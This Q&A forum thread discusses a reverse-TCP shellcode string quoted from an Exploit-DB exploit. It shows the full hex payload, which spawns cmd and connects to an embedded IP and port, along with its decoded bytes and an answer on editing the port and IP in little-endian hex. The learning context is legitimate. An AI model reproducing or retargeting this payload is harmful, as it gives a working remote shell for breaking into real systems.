# How to decode hex code and modify it? Binascii.unhexlify

Tags: exploit, python, reverse-engineering, shellcode

I am reviewing the code hosted at [edb](https://www.exploit-db.com/exploits/41987/) and the portion I am trying to make sense of and modify is at line 78

```
reversetcp_shellcode = binascii.unhexlify(b'fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000539c0a87d8541544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5')
```

I imported binascii into python and tried to reverse engineer the code and the result was:

```
'\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`H\x8bR\x18H\x8bR H\x8brPH\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQH\x8bR \x8bB<H\x01\xd0\x8b\x80\x88\x00\x00\x00H\x85\xc0tgH\x01\xd0P\x8bH\x18D\x8b@ I\x01\xd0\xe3VH\xff\xc9A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1L\x03L$\x08E9\xd1u\xd8XD\x8b@$I\x01\xd0fA\x8b\x0cHD\x8b@\x1cI\x01\xd0A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZH\x8b\x12\xe9W\xff\xff\xff]I\xbews2_32\x00\x00AVI\x89\xe6H\x81\xec\xa0\x01\x00\x00I\x89\xe5I\xbc\x02\x00\x059\xc0\xa8}\x85ATI\x89\xe4L\x89\xf1A\xbaLw&\x07\xff\xd5L\x89\xeah\x01\x01\x00\x00YA\xba)\x80k\x00\xff\xd5PPM1\xc9M1\xc0H\xff\xc0H\x89\xc2H\xff\xc0H\x89\xc1A\xba\xea\x0f\xdf\xe0\xff\xd5H\x89\xc7j\x10AXL\x89\xe2H\x89\xf9A\xba\x99\xa5ta\xff\xd5H\x81\xc4@\x02\x00\x00I\xb8cmd\x00\x00\x00\x00\x00APAPH\x89\xe2WWWM1\xc0j\rYAP\xe2\xfcf\xc7D$T\x01\x01H\x8dD$\x18\xc6\x00hH\x89\xe6VPAPAPAPI\xff\xc0API\xff\xc8M\x89\xc1L\x89\xc1A\xbay\xcc?\x86\xff\xd5H1\xd2H\xff\xca\x8b\x0eA\xba\x08\x87\x1d`\xff\xd5\xbb\xf0\xb5\xa2VA\xba\xa6\x95\xbd\x9d\xff\xd5H\x83\xc4(<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00YA\x89\xda\xff\xd5'
```

There are alien characters above. Is it still considered hex? And, If I wanted to use a different IP and PORT addresses, how would I make the necessary conversion?

Comment: What do you mean by "alien characters"?

Comment: These are bytes not characters.   A character encoding translates bytes into characters.   It now happens that some of these bytes, the \x??ones, have no meaning in ASCII, the default encoding in Python.  // I know there are a few inaccuracies in this comment, but hey it's just a comment.

Comment: The decoding was successful.   Python just does this with binary strings.  If you `print` it, it will look different (and might mess up your terminal).

Comment: @OskarSkog, that is fine. but if I want to modify it, how do I make that payload? For example, does msfvenom has any encoder which does that for me so I can just swap the payload?

Answer (score 1, accepted):

The reason you're seeing alien characters is that it's displaying hex characters when it has to ('\xfc', for example), and ASCII when it's mappable (so the 'H' immediately following is there instead of '\x48'). So it's not pure hex - it's an ASCII string with the non-ASCII characters hex-encoded.

Are the ip address and port encoded in there? You can likely just find them in the original hex string, before attempting to decode them, and change it.

Just remember that they're probably encoded as little endian. Normally when I'm writing shellcode, I use a port where endianness doesn't matter, like 0x1313 or 0x6666. But that's just laziness! If you want to find and replace their port number, if it's for example 4444 (0x115c), you'll probably want to search for '5c11' (little endian) and replace it with the port you want (like 0x6666 or whatever).

Comment: Very interesting, I did not know I can just modify the hex within the payload and make it work. Would you know how to create an msf payload from scratch that I can just swap it with this one on the exploit? Also, is swapping the IP and Port in the hexcode always successful?